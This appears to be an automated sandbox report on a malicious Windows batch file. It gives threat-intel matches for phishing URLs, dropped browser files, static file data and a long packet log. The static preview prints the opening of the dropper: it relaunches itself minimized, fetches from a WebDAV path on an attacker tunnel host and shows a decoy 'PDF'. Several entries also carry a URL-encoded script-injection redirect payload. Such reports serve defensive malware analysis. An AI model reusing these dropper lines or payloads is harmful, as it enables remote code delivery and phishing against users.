Excluded IPs from analysis (whitelisted): 142.250.186.163, 142.250.186.78, 74.125.133.84, 34.104.35.123, 199.232.210.172, 192.229.221.95, 172.217.18.3, 142.250.184.238
Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, time.windows.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, update.googleapis.com, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: file.bat

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
239.255.255.250	https://neuraxpharm.eurosbiolab.eu/?__cf_chl_rt_tk=TES3LKGEhjH1G5Ym.iTFDxwaSWwxOocOm2ySKfq7pJU-1716481117-0.0.1.1-1621	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse
	https://sites.google.com/view/bakcsa3/?yj0&d=DwMFaQ	Get hash	malicious	Unknown	Browse
	https://js.schema-forms.org	Get hash	malicious	Unknown	Browse
	http://0x00003.000375.64090/images.php?p=%31%30%30%35%32%30%30%30%30%36%33%39%22%3E%3C%2F%64%69%76%3E%3C%73%63%72%69%70%74%3E%77%69%6E%64%6F%77%5B%27%6C%6F%63%61%74%69%6F%6E%27%5D%5B%27%72%65%70%6C%61%63%65%27%5D%28%5B%27%68%74%74%70%73%3A%2F%2F%69%6D%70%75%74%65%6C%65%74%74%65%27%2C%20%27%72%2E%63%6F%6D%2F%30%2F%30%2F%30%2F%27%2C%20%27%39%65%36%37%33%38%30%34%63%65%35%37%37%30%32%34%33%32%63%30%65%31%66%65%33%61%63%33%35%38%39%62%27%2C%27/12/101/10542/964/156117/16845%27%5D%5B%27%6A%6F%69%6E%27%5D%28%27%27%29%29%2C%64%6F%63%75%6D%65%6E%74%5B%27%62%6F%64%79%27%5D%5B%27%73%74%79%6C%65%27%5D%5B%27%6F%70%61%63%69%74%79%27%5D%3D%30%78%30%3B%3C%2F%73%63%72%69%70%74%3E	Get hash	malicious	Phisher	Browse
	ELECTRONIC RECEIPT_Europait.html	Get hash	malicious	HTMLPhisher	Browse
	https://microsoftedge.microsoft.com/addons/detail/rocketreach-edge-extensio/ldjlhlheoidifojmfkjfijmdhlagakni	Get hash	malicious	Unknown	Browse
	http://al.levels.fyi	Get hash	malicious	Unknown	Browse
	phish_alert_sp2_2.0.0.0-214.eml	Get hash	malicious	Unknown	Browse
	https://mydhl.express.dhl$tracking_link/	Get hash	malicious	Unknown	Browse
	https://drive.google.com/drive/folders/1Zsq5Vi6xg6khSGcx49wWM-Q7O4uJNp0w?usp=sharing	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
google.com	https://neuraxpharm.eurosbiolab.eu/?__cf_chl_rt_tk=TES3LKGEhjH1G5Ym.iTFDxwaSWwxOocOm2ySKfq7pJU-1716481117-0.0.1.1-1621	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	142.250.186.100
	https://js.schema-forms.org	Get hash	malicious	Unknown	Browse	172.217.18.4
	http://0x00003.000375.64090/images.php?p=%31%30%30%35%32%30%30%30%30%36%33%39%22%3E%3C%2F%64%69%76%3E%3C%73%63%72%69%70%74%3E%77%69%6E%64%6F%77%5B%27%6C%6F%63%61%74%69%6F%6E%27%5D%5B%27%72%65%70%6C%61%63%65%27%5D%28%5B%27%68%74%74%70%73%3A%2F%2F%69%6D%70%75%74%65%6C%65%74%74%65%27%2C%20%27%72%2E%63%6F%6D%2F%30%2F%30%2F%30%2F%27%2C%20%27%39%65%36%37%33%38%30%34%63%65%35%37%37%30%32%34%33%32%63%30%65%31%66%65%33%61%63%33%35%38%39%62%27%2C%27/12/101/10542/964/156117/16845%27%5D%5B%27%6A%6F%69%6E%27%5D%28%27%27%29%29%2C%64%6F%63%75%6D%65%6E%74%5B%27%62%6F%64%79%27%5D%5B%27%73%74%79%6C%65%27%5D%5B%27%6F%70%61%63%69%74%79%27%5D%3D%30%78%30%3B%3C%2F%73%63%72%69%70%74%3E	Get hash	malicious	Phisher	Browse	142.250.186.68
	ELECTRONIC RECEIPT_Europait.html	Get hash	malicious	HTMLPhisher	Browse	142.250.186.68
	https://microsoftedge.microsoft.com/addons/detail/rocketreach-edge-extensio/ldjlhlheoidifojmfkjfijmdhlagakni	Get hash	malicious	Unknown	Browse	172.217.16.196
	http://al.levels.fyi	Get hash	malicious	Unknown	Browse	142.250.186.100

ASNs

⊘No context

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	https://neuraxpharm.eurosbiolab.eu/?__cf_chl_rt_tk=TES3LKGEhjH1G5Ym.iTFDxwaSWwxOocOm2ySKfq7pJU-1716481117-0.0.1.1-1621	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	40.68.123.157 23.43.61.160
	https://sites.google.com/view/bakcsa3/?yj0&d=DwMFaQ	Get hash	malicious	Unknown	Browse	40.68.123.157 23.43.61.160
	https://js.schema-forms.org	Get hash	malicious	Unknown	Browse	40.68.123.157 23.43.61.160
	http://0x00003.000375.64090/images.php?p=%31%30%30%35%32%30%30%30%30%36%33%39%22%3E%3C%2F%64%69%76%3E%3C%73%63%72%69%70%74%3E%77%69%6E%64%6F%77%5B%27%6C%6F%63%61%74%69%6F%6E%27%5D%5B%27%72%65%70%6C%61%63%65%27%5D%28%5B%27%68%74%74%70%73%3A%2F%2F%69%6D%70%75%74%65%6C%65%74%74%65%27%2C%20%27%72%2E%63%6F%6D%2F%30%2F%30%2F%30%2F%27%2C%20%27%39%65%36%37%33%38%30%34%63%65%35%37%37%30%32%34%33%32%63%30%65%31%66%65%33%61%63%33%35%38%39%62%27%2C%27/12/101/10542/964/156117/16845%27%5D%5B%27%6A%6F%69%6E%27%5D%28%27%27%29%29%2C%64%6F%63%75%6D%65%6E%74%5B%27%62%6F%64%79%27%5D%5B%27%73%74%79%6C%65%27%5D%5B%27%6F%70%61%63%69%74%79%27%5D%3D%30%78%30%3B%3C%2F%73%63%72%69%70%74%3E	Get hash	malicious	Phisher	Browse	40.68.123.157 23.43.61.160
	ELECTRONIC RECEIPT_Europait.html	Get hash	malicious	HTMLPhisher	Browse	40.68.123.157 23.43.61.160
	http://al.levels.fyi	Get hash	malicious	Unknown	Browse	40.68.123.157 23.43.61.160
	phish_alert_sp2_2.0.0.0-214.eml	Get hash	malicious	Unknown	Browse	40.68.123.157 23.43.61.160
	https://mydhl.express.dhl$tracking_link/	Get hash	malicious	Unknown	Browse	40.68.123.157 23.43.61.160
	https://drive.google.com/drive/folders/1Zsq5Vi6xg6khSGcx49wWM-Q7O4uJNp0w?usp=sharing	Get hash	malicious	Unknown	Browse	40.68.123.157 23.43.61.160
	https://github.com/ustaxes/UsTaxes/files/15378217/All.2023.Tax.Documents.zip	Get hash	malicious	Unknown	Browse	40.68.123.157 23.43.61.160

Dropped Files

⊘No context

Created / dropped Files

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7120_1970308789\LICENSE

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1558
Entropy (8bit):	5.11458514637545
Encrypted:	false
SSDEEP:	48:OBOCrYJ4rYJVwUCLHDy43HV713XEyMmZ3teTHn:LCrYJ4rYJVwUCHZ3Z13XtdUTH
MD5:	EE002CB9E51BB8DFA89640A406A1090A
SHA1:	49EE3AD535947D8821FFDEB67FFC9BC37D1EBBB2
SHA-256:	3DBD2C90050B652D63656481C3E5871C52261575292DB77D4EA63419F187A55B
SHA-512:	D1FDCC436B8CA8C68D4DC7077F84F803A535BF2CE31D9EB5D0C466B62D6567B2C59974995060403ED757E92245DB07E70C6BDDBF1C3519FED300CC5B9BF9177C
Malicious:	false
Preview:	// Copyright 2015 The Chromium Authors. All rights reserved..//.// Redistribution and use in source and binary forms, with or without.// modification, are permitted provided that the following conditions are.// met:.//.// * Redistributions of source code must retain the above copyright.// notice, this list of conditions and the following disclaimer..// * Redistributions in binary form must reproduce the above.// copyright notice, this list of conditions and the following disclaimer.// in the documentation and/or other materials provided with the.// distribution..// * Neither the name of Google Inc. nor the names of its.// contributors may be used to endorse or promote products derived from.// this software without specific prior written permission..//.// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS.// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT.// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR.// A PARTICULAR

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7120_1970308789\_metadata\verified_contents.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1864
Entropy (8bit):	5.99136283355077
Encrypted:	false
SSDEEP:	48:p/hUI1uLIrAdIi17akd8+vZvZAALRQkNKaLDekpvW:RnNQI+7amlBvZAKRQi3ekdW
MD5:	884209DC825F17BCF6433F2DD3C7E6FD
SHA1:	A38A1A859C781FD6F7BD52CFD62CE685CA5A910D
SHA-256:	B62C892D3B126AD917D30310BD400C333029727C88140E9C9E6420AE3E26DEED
SHA-512:	BC1F8D656C7D617D7C9C289DD6E49AC19301BE9597B89DBC41DEC6CA6CC719C6ECA7F28B3F992A6ADBF587202C3C04CE0835C5459407F888EFB1281FF77F8201
Malicious:	false
Preview:	[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJMSUNFTlNFIiwicm9vdF9oYXNoIjoiUGIwc2tBVUxaUzFqWldTQnctV0hIRkltRlhVcExiZDlUcVkwR2ZHSHBWcyJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJMVzhZaVRQM1lxbU5iMWVXUTQxajBVRmZObUhRUlNMREtRQ1lSRUFwZjRBIn0seyJwYXRoIjoic2V0cy5qc29uIiwicm9vdF9oYXNoIjoiV3hOdUFtQnlzQ0k1NnRtdTRBX1BNMUYtaUNBaWJuXzJtM2tOdGtka25INCJ9XSwiZm9ybWF0IjoidHJlZWhhc2giLCJoYXNoX2Jsb2NrX3NpemUiOjQwOTZ9XSwiaXRlbV9pZCI6ImdvbnBlbWRna2pjZWNkZ2JuYWFiaXBwcGJtZ2ZnZ2JlIiwiaXRlbV92ZXJzaW9uIjoiMjAyNC41LjE0LjAiLCJwcm90b2NvbF92ZXJzaW9uIjoxfQ","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"FyhsZV91g2fM48fWCbRoIt5Z4L9u9uKeVBrevEE_fcaxnHu2YKCITYZCsfuIiRaQ0ioSrONndIR3o_NRLn94EeCjW9mx09YGbtIDuaJKHalmPzYIKcJvpnfGWUQ4tFVwkVRvmC2Tczv3CxqyCojE9cr4qr4Oo19wV9CcABBCXyiAlY3UDUkteh0C6JBtQ9JS4V_PmMD4xZ0-W7Ly1irhspj4QWnVLZoOBO121sn4rC8vsNNLR8K2rXS

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7120_1970308789\manifest.fingerprint

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	66
Entropy (8bit):	3.7748418475126835
Encrypted:	false
SSDEEP:	3:S8g+WBDTZy0suxRSA1er1Cl:SD0Oxm5Cl
MD5:	12E4B45B481A49CB9793C4EB9EEB686D
SHA1:	8A1C3CD932D7441ACA1FDA1B077BFFAC53067E6A
SHA-256:	0B26105D6FCD078FC074E3F43012735C3C9D62E20B3C4DB205DEA4A8841ACE18
SHA-512:	026B9E240002166064E91BA063A2867F2A76F25FD0017661F082C877FE5F6067BDDCCB59DE187BD7AC31147DA054EB63969AF63EAD01F8F4469DD9168EF85BBC
Malicious:	false
Preview:	1.a0d36633da5e9660efefde44a0762f678cb7a0e47eca24d0f3e479b6ae303673

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7120_1970308789\manifest.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	85
Entropy (8bit):	4.462192586591686
Encrypted:	false
SSDEEP:	3:rR6TAulhFphifFCmMARWHJqS1gLIJY:F6VlM8aRWpqS1gL2Y
MD5:	96644BF9C61D98F0ABBCB29D385C4DF2
SHA1:	83F15025C8B68D609DC3653517B224C8AED08602
SHA-256:	2D6F188933F762A98D6F5796438D63D1415F3661D04522C32900984440297F80
SHA-512:	F185B72778A001005A73052AB108EFE53A0C70A4A6B274D5B0F33160998A32FFA5CFFE730005258E3398041DE28452907B38A7AE2E632C6EB095BE700337D704
Malicious:	false
Preview:	{. "manifest_version": 2,. "name": "First Party Sets",. "version": "2024.5.14.0".}

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7120_1970308789\sets.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	7793
Entropy (8bit):	4.61890378232256
Encrypted:	false
SSDEEP:	96:Mon4mdqX1gs1/BNKLcxbdmf5688PTGXvcxKuP+8qJq:v7qljBkIVRPTGXvcx1sq
MD5:	94679DFD3B9168DAA5214E36B8E12730
SHA1:	DE6965B81658AD978483F3A809641C66C2A92D12
SHA-256:	83D4ABA459DB56533A15A34889D633A5EB0AE6CFB90483D5BC60FC6CA72AC7D3
SHA-512:	156D83BFB12C4C3424BDF7929CC8977D8025A08301B942F5B7474D61EC7421DE0EADF6923619EED4B4EC66CC742ACF1201C3438E1947B05F14C8F172194F5D6E
Malicious:	false
Preview:	{"primary":"https://bild.de","associatedSites":["https://welt.de","https://autobild.de","https://computerbild.de","https://wieistmeineip.de"],"serviceSites":["https://www.asadcdn.com"]}.{"primary":"https://blackrock.com","associatedSites":["https://blackrockadvisorelite.it","https://cachematrix.com","https://efront.com","https://etfacademy.it","https://ishares.com"]}.{"primary":"https://cafemedia.com","associatedSites":["https://cardsayings.net","https://nourishingpursuits.com"]}.{"primary":"https://caracoltv.com","associatedSites":["https://noticiascaracol.com","https://bluradio.com","https://shock.co","https://bumbox.com","https://hjck.com"]}.{"primary":"https://carcostadvisor.com","ccTLDs":{"https://carcostadvisor.com":["https://carcostadvisor.be","https://carcostadvisor.fr"]}}.{"primary":"https://elpais.com.uy","associatedSites":["https://clubelpais.com.uy","https://paula.com.uy","https://gallito.com.uy"],"ccTLDs":{"https://elpais.com.uy":["https://elpais.uy"]}}.{"primary":"https:/

Static File Info

General

File type:	DOS batch file, ASCII text, with CRLF line terminators
Entropy (8bit):	4.935296566461422
TrID:
File name:	file.bat
File size:	1'993 bytes
MD5:	2125f3d556ad5c646f7ec80168bdbb15
SHA1:	4fc0591f079e142e327c3fc4da0fc98c562342bc
SHA256:	ef9e3f4e08e0ca9d2ba97951b3dce68e8ce385c4c05a0ef8aedbe3b59e016367
SHA512:	f7aae48248ba0eff06103099cf49dc8311aae823141f2ec277486c3c365a8074e092f596269db4f2be563b66a70f1a7d8915c8e9228375a6a06611b32abf31a3
SSDEEP:	48:V2wqXFTIox2XZmx4nn3kx43Px726+rXQjQZhQelQ24Q/DQKQI7QiQzrXzQiQ7QwC:VsFTIv4rU6hvlf4qDfrODtsxzl8oc5z
TLSH:	0741E8A2481DC121B2672EF6DB3916BF6D2814C99102780860E7D5FF5633E49936BBF4
File Content Preview:	@echo off..setlocal..if "%1" == "" start "" /min "%~f0" MY_FLAG && exit....set source=\\invoicetrycloudflare.com@9983\DavWWWRoot\google\Win..set destination=%USERPROFILE%\Pictures....echo Opening PDF file.....start "" "https://valuable-gazette-shock-medic

File Icon


Icon Hash:	9686878b929a9886

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 23, 2024 18:24:00.234096050 CEST	49674	443	192.168.2.7	104.98.116.138
May 23, 2024 18:24:00.234097004 CEST	49675	443	192.168.2.7	104.98.116.138
May 23, 2024 18:24:00.421288013 CEST	49672	443	192.168.2.7	104.98.116.138
May 23, 2024 18:24:01.390439034 CEST	49671	443	192.168.2.7	204.79.197.203
May 23, 2024 18:24:01.702665091 CEST	49671	443	192.168.2.7	204.79.197.203
May 23, 2024 18:24:02.312027931 CEST	49671	443	192.168.2.7	204.79.197.203
May 23, 2024 18:24:03.515096903 CEST	49671	443	192.168.2.7	204.79.197.203
May 23, 2024 18:24:05.926661968 CEST	49671	443	192.168.2.7	204.79.197.203
May 23, 2024 18:24:09.606378078 CEST	49707	443	192.168.2.7	142.250.185.164
May 23, 2024 18:24:09.606415033 CEST	443	49707	142.250.185.164	192.168.2.7
May 23, 2024 18:24:09.606499910 CEST	49707	443	192.168.2.7	142.250.185.164
May 23, 2024 18:24:09.606842041 CEST	49707	443	192.168.2.7	142.250.185.164
May 23, 2024 18:24:09.606858969 CEST	443	49707	142.250.185.164	192.168.2.7
May 23, 2024 18:24:09.844738007 CEST	49674	443	192.168.2.7	104.98.116.138
May 23, 2024 18:24:09.844738960 CEST	49675	443	192.168.2.7	104.98.116.138
May 23, 2024 18:24:09.938375950 CEST	49677	443	192.168.2.7	20.50.201.200
May 23, 2024 18:24:10.030841112 CEST	49672	443	192.168.2.7	104.98.116.138
May 23, 2024 18:24:10.311160088 CEST	49677	443	192.168.2.7	20.50.201.200
May 23, 2024 18:24:10.342216969 CEST	443	49707	142.250.185.164	192.168.2.7
May 23, 2024 18:24:10.348308086 CEST	49707	443	192.168.2.7	142.250.185.164
May 23, 2024 18:24:10.348321915 CEST	443	49707	142.250.185.164	192.168.2.7
May 23, 2024 18:24:10.349201918 CEST	443	49707	142.250.185.164	192.168.2.7
May 23, 2024 18:24:10.349273920 CEST	49707	443	192.168.2.7	142.250.185.164
May 23, 2024 18:24:10.386562109 CEST	49707	443	192.168.2.7	142.250.185.164
May 23, 2024 18:24:10.386646986 CEST	443	49707	142.250.185.164	192.168.2.7
May 23, 2024 18:24:10.437355995 CEST	49707	443	192.168.2.7	142.250.185.164
May 23, 2024 18:24:10.437367916 CEST	443	49707	142.250.185.164	192.168.2.7
May 23, 2024 18:24:10.484245062 CEST	49707	443	192.168.2.7	142.250.185.164
May 23, 2024 18:24:10.497136116 CEST	49708	443	192.168.2.7	23.43.61.160
May 23, 2024 18:24:10.497164965 CEST	443	49708	23.43.61.160	192.168.2.7
May 23, 2024 18:24:10.497270107 CEST	49708	443	192.168.2.7	23.43.61.160
May 23, 2024 18:24:10.508203030 CEST	49708	443	192.168.2.7	23.43.61.160
May 23, 2024 18:24:10.508220911 CEST	443	49708	23.43.61.160	192.168.2.7
May 23, 2024 18:24:10.734273911 CEST	49671	443	192.168.2.7	204.79.197.203
May 23, 2024 18:24:11.062114954 CEST	49677	443	192.168.2.7	20.50.201.200
May 23, 2024 18:24:11.787751913 CEST	443	49699	104.98.116.138	192.168.2.7
May 23, 2024 18:24:11.787873030 CEST	49699	443	192.168.2.7	104.98.116.138
May 23, 2024 18:24:12.563180923 CEST	49677	443	192.168.2.7	20.50.201.200
May 23, 2024 18:24:15.546761036 CEST	49677	443	192.168.2.7	20.50.201.200
May 23, 2024 18:24:18.846820116 CEST	443	49708	23.43.61.160	192.168.2.7
May 23, 2024 18:24:18.847131968 CEST	49708	443	192.168.2.7	23.43.61.160
May 23, 2024 18:24:19.137557983 CEST	49708	443	192.168.2.7	23.43.61.160
May 23, 2024 18:24:19.137589931 CEST	443	49708	23.43.61.160	192.168.2.7
May 23, 2024 18:24:19.137983084 CEST	443	49708	23.43.61.160	192.168.2.7
May 23, 2024 18:24:19.189657927 CEST	49708	443	192.168.2.7	23.43.61.160
May 23, 2024 18:24:19.292696953 CEST	49708	443	192.168.2.7	23.43.61.160
May 23, 2024 18:24:19.334503889 CEST	443	49708	23.43.61.160	192.168.2.7
May 23, 2024 18:24:19.543943882 CEST	443	49708	23.43.61.160	192.168.2.7
May 23, 2024 18:24:19.544265985 CEST	49708	443	192.168.2.7	23.43.61.160
May 23, 2024 18:24:19.544265985 CEST	49708	443	192.168.2.7	23.43.61.160
May 23, 2024 18:24:19.544289112 CEST	443	49708	23.43.61.160	192.168.2.7
May 23, 2024 18:24:19.544459105 CEST	443	49708	23.43.61.160	192.168.2.7
May 23, 2024 18:24:19.544497013 CEST	443	49708	23.43.61.160	192.168.2.7
May 23, 2024 18:24:19.544536114 CEST	49708	443	192.168.2.7	23.43.61.160
May 23, 2024 18:24:19.609631062 CEST	49709	443	192.168.2.7	23.43.61.160
May 23, 2024 18:24:19.609720945 CEST	443	49709	23.43.61.160	192.168.2.7
May 23, 2024 18:24:19.609838963 CEST	49709	443	192.168.2.7	23.43.61.160
May 23, 2024 18:24:19.610177994 CEST	49709	443	192.168.2.7	23.43.61.160
May 23, 2024 18:24:19.610212088 CEST	443	49709	23.43.61.160	192.168.2.7
May 23, 2024 18:24:20.168777943 CEST	443	49707	142.250.185.164	192.168.2.7
May 23, 2024 18:24:20.168848991 CEST	443	49707	142.250.185.164	192.168.2.7
May 23, 2024 18:24:20.168910027 CEST	49707	443	192.168.2.7	142.250.185.164
May 23, 2024 18:24:20.278836966 CEST	443	49709	23.43.61.160	192.168.2.7
May 23, 2024 18:24:20.278908968 CEST	49709	443	192.168.2.7	23.43.61.160
May 23, 2024 18:24:20.280667067 CEST	49709	443	192.168.2.7	23.43.61.160
May 23, 2024 18:24:20.280677080 CEST	443	49709	23.43.61.160	192.168.2.7
May 23, 2024 18:24:20.281152964 CEST	443	49709	23.43.61.160	192.168.2.7
May 23, 2024 18:24:20.282277107 CEST	49709	443	192.168.2.7	23.43.61.160
May 23, 2024 18:24:20.322504044 CEST	443	49709	23.43.61.160	192.168.2.7
May 23, 2024 18:24:20.506468058 CEST	49671	443	192.168.2.7	204.79.197.203
May 23, 2024 18:24:20.633491039 CEST	443	49709	23.43.61.160	192.168.2.7
May 23, 2024 18:24:20.633558035 CEST	443	49709	23.43.61.160	192.168.2.7
May 23, 2024 18:24:20.633681059 CEST	49709	443	192.168.2.7	23.43.61.160
May 23, 2024 18:24:20.645169973 CEST	49709	443	192.168.2.7	23.43.61.160
May 23, 2024 18:24:20.645169973 CEST	49709	443	192.168.2.7	23.43.61.160
May 23, 2024 18:24:20.645193100 CEST	443	49709	23.43.61.160	192.168.2.7
May 23, 2024 18:24:20.645201921 CEST	443	49709	23.43.61.160	192.168.2.7
May 23, 2024 18:24:20.713367939 CEST	49710	443	192.168.2.7	40.68.123.157
May 23, 2024 18:24:20.713397026 CEST	443	49710	40.68.123.157	192.168.2.7
May 23, 2024 18:24:20.713557959 CEST	49710	443	192.168.2.7	40.68.123.157
May 23, 2024 18:24:20.714508057 CEST	49710	443	192.168.2.7	40.68.123.157
May 23, 2024 18:24:20.714541912 CEST	443	49710	40.68.123.157	192.168.2.7
May 23, 2024 18:24:21.500008106 CEST	49677	443	192.168.2.7	20.50.201.200
May 23, 2024 18:24:21.555310965 CEST	443	49710	40.68.123.157	192.168.2.7
May 23, 2024 18:24:21.555429935 CEST	49710	443	192.168.2.7	40.68.123.157
May 23, 2024 18:24:21.557385921 CEST	49710	443	192.168.2.7	40.68.123.157
May 23, 2024 18:24:21.557398081 CEST	443	49710	40.68.123.157	192.168.2.7
May 23, 2024 18:24:21.557786942 CEST	443	49710	40.68.123.157	192.168.2.7
May 23, 2024 18:24:21.609386921 CEST	49710	443	192.168.2.7	40.68.123.157
May 23, 2024 18:24:22.142465115 CEST	49707	443	192.168.2.7	142.250.185.164
May 23, 2024 18:24:22.142499924 CEST	443	49707	142.250.185.164	192.168.2.7
May 23, 2024 18:24:22.217885971 CEST	49710	443	192.168.2.7	40.68.123.157
May 23, 2024 18:24:22.258511066 CEST	443	49710	40.68.123.157	192.168.2.7
May 23, 2024 18:24:22.504065037 CEST	443	49710	40.68.123.157	192.168.2.7
May 23, 2024 18:24:22.504091978 CEST	443	49710	40.68.123.157	192.168.2.7
May 23, 2024 18:24:22.504098892 CEST	443	49710	40.68.123.157	192.168.2.7
May 23, 2024 18:24:22.504162073 CEST	443	49710	40.68.123.157	192.168.2.7
May 23, 2024 18:24:22.504167080 CEST	49710	443	192.168.2.7	40.68.123.157
May 23, 2024 18:24:22.504220963 CEST	443	49710	40.68.123.157	192.168.2.7
May 23, 2024 18:24:22.504246950 CEST	443	49710	40.68.123.157	192.168.2.7
May 23, 2024 18:24:22.504276037 CEST	443	49710	40.68.123.157	192.168.2.7
May 23, 2024 18:24:22.504292011 CEST	49710	443	192.168.2.7	40.68.123.157
May 23, 2024 18:24:22.504312992 CEST	49710	443	192.168.2.7	40.68.123.157
May 23, 2024 18:24:22.504333019 CEST	49710	443	192.168.2.7	40.68.123.157
May 23, 2024 18:24:22.519073009 CEST	443	49710	40.68.123.157	192.168.2.7
May 23, 2024 18:24:22.519146919 CEST	443	49710	40.68.123.157	192.168.2.7
May 23, 2024 18:24:22.519171953 CEST	49710	443	192.168.2.7	40.68.123.157
May 23, 2024 18:24:22.519216061 CEST	49710	443	192.168.2.7	40.68.123.157
May 23, 2024 18:24:23.115398884 CEST	49710	443	192.168.2.7	40.68.123.157
May 23, 2024 18:24:23.115439892 CEST	443	49710	40.68.123.157	192.168.2.7
May 23, 2024 18:24:23.115469933 CEST	49710	443	192.168.2.7	40.68.123.157
May 23, 2024 18:24:23.115478039 CEST	443	49710	40.68.123.157	192.168.2.7
May 23, 2024 18:24:33.405916929 CEST	49677	443	192.168.2.7	20.50.201.200
May 23, 2024 18:24:59.725152016 CEST	49716	443	192.168.2.7	40.68.123.157
May 23, 2024 18:24:59.725224972 CEST	443	49716	40.68.123.157	192.168.2.7
May 23, 2024 18:24:59.725321054 CEST	49716	443	192.168.2.7	40.68.123.157
May 23, 2024 18:24:59.725958109 CEST	49716	443	192.168.2.7	40.68.123.157
May 23, 2024 18:24:59.725971937 CEST	443	49716	40.68.123.157	192.168.2.7
May 23, 2024 18:25:00.572562933 CEST	443	49716	40.68.123.157	192.168.2.7
May 23, 2024 18:25:00.572916031 CEST	49716	443	192.168.2.7	40.68.123.157
May 23, 2024 18:25:00.578516006 CEST	49716	443	192.168.2.7	40.68.123.157
May 23, 2024 18:25:00.578557968 CEST	443	49716	40.68.123.157	192.168.2.7
May 23, 2024 18:25:00.578780890 CEST	443	49716	40.68.123.157	192.168.2.7
May 23, 2024 18:25:00.587932110 CEST	49716	443	192.168.2.7	40.68.123.157
May 23, 2024 18:25:00.634500027 CEST	443	49716	40.68.123.157	192.168.2.7
May 23, 2024 18:25:00.963037968 CEST	443	49716	40.68.123.157	192.168.2.7
May 23, 2024 18:25:00.963099003 CEST	443	49716	40.68.123.157	192.168.2.7
May 23, 2024 18:25:00.963141918 CEST	443	49716	40.68.123.157	192.168.2.7
May 23, 2024 18:25:00.963340044 CEST	49716	443	192.168.2.7	40.68.123.157
May 23, 2024 18:25:00.963340044 CEST	49716	443	192.168.2.7	40.68.123.157
May 23, 2024 18:25:00.963366985 CEST	443	49716	40.68.123.157	192.168.2.7
May 23, 2024 18:25:00.963552952 CEST	49716	443	192.168.2.7	40.68.123.157
May 23, 2024 18:25:00.981631994 CEST	443	49716	40.68.123.157	192.168.2.7
May 23, 2024 18:25:00.981726885 CEST	443	49716	40.68.123.157	192.168.2.7
May 23, 2024 18:25:00.981776953 CEST	443	49716	40.68.123.157	192.168.2.7
May 23, 2024 18:25:00.981914043 CEST	49716	443	192.168.2.7	40.68.123.157
May 23, 2024 18:25:00.981914043 CEST	49716	443	192.168.2.7	40.68.123.157
May 23, 2024 18:25:00.981956005 CEST	49716	443	192.168.2.7	40.68.123.157
May 23, 2024 18:25:00.981956005 CEST	49716	443	192.168.2.7	40.68.123.157
May 23, 2024 18:25:00.981973886 CEST	443	49716	40.68.123.157	192.168.2.7
May 23, 2024 18:25:00.981987000 CEST	443	49716	40.68.123.157	192.168.2.7
May 23, 2024 18:25:07.233587027 CEST	61582	53	192.168.2.7	1.1.1.1
May 23, 2024 18:25:07.275485992 CEST	53	61582	1.1.1.1	192.168.2.7
May 23, 2024 18:25:07.275691032 CEST	61582	53	192.168.2.7	1.1.1.1
May 23, 2024 18:25:07.282809973 CEST	61582	53	192.168.2.7	1.1.1.1
May 23, 2024 18:25:07.303299904 CEST	53	61582	1.1.1.1	192.168.2.7
May 23, 2024 18:25:07.763396025 CEST	53	61582	1.1.1.1	192.168.2.7
May 23, 2024 18:25:07.765034914 CEST	61582	53	192.168.2.7	1.1.1.1
May 23, 2024 18:25:07.770452976 CEST	53	61582	1.1.1.1	192.168.2.7
May 23, 2024 18:25:07.770540953 CEST	61582	53	192.168.2.7	1.1.1.1
May 23, 2024 18:25:09.639992952 CEST	61584	443	192.168.2.7	142.250.185.164
May 23, 2024 18:25:09.640041113 CEST	443	61584	142.250.185.164	192.168.2.7
May 23, 2024 18:25:09.640150070 CEST	61584	443	192.168.2.7	142.250.185.164
May 23, 2024 18:25:09.640388012 CEST	61584	443	192.168.2.7	142.250.185.164
May 23, 2024 18:25:09.640404940 CEST	443	61584	142.250.185.164	192.168.2.7
May 23, 2024 18:25:10.292535067 CEST	443	61584	142.250.185.164	192.168.2.7
May 23, 2024 18:25:10.343926907 CEST	61584	443	192.168.2.7	142.250.185.164
May 23, 2024 18:25:10.360009909 CEST	61584	443	192.168.2.7	142.250.185.164
